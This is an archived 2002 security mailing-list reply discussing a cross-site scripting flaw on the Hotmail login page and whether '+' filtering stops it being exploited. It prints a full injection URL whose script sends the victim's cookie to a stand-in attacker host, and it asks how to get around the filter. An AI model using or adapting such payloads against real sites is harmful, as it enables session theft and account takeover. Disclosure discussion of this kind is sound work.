RE: XSS bug in hotmail login page

[Russell Harding <hardingr () cunap com>]

Hello, comments below:

On Mon, 7 Oct 2002, Thor Larholm wrote:

> It's very simple, you can inject arbitrary scripting to be executed by the
> user in the context of hotmail. This means that you can e.g. steal his
> cookies or, if he's logged in, write emails from his account, delete his
> mails and change his password.

  I'm not sure this is the case (severity)... Hotmail strips +'s and %2B's
from GET requests.  While you can view your own cookies easily, I'm not
sure if you can still exploit this bug.  I do know filtering these
characters prevents this sort of attack:

http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb=";><script>document.location.replace('http://attacker.com/steal.cgi?'+document.cookie);</script>&ct=1033054530&_setlang=

Is there another way to exploit this which I am not seeing? Or does MSN
actually have their act together (in this particular case...)?

       -Russell

P.S. Well, I suppose the real question may be this:
Is there a way to concatenate javascript strings without "+" or "%2B"?



On Mon, 7 Oct 2002, Thor Larholm wrote:

> > From: Peter Rdam [mailto:hell () weedmail com]
> > They didnt reacted, and im pretty curious about what
> > is possible with the bug. And i actually hope that
> > someone can tell me about it and maybe Microsoft will
> > do something about it..
>
> It's very simple, you can inject arbitrary scripting to be executed by the
> user in the context of hotmail. This means that you can e.g. steal his
> cookies or, if he's logged in, write emails from his account, delete his
> mails and change his password.
>
>
>
> Regards
> Thor Larholm
> Jubii A/S - Internet Programmer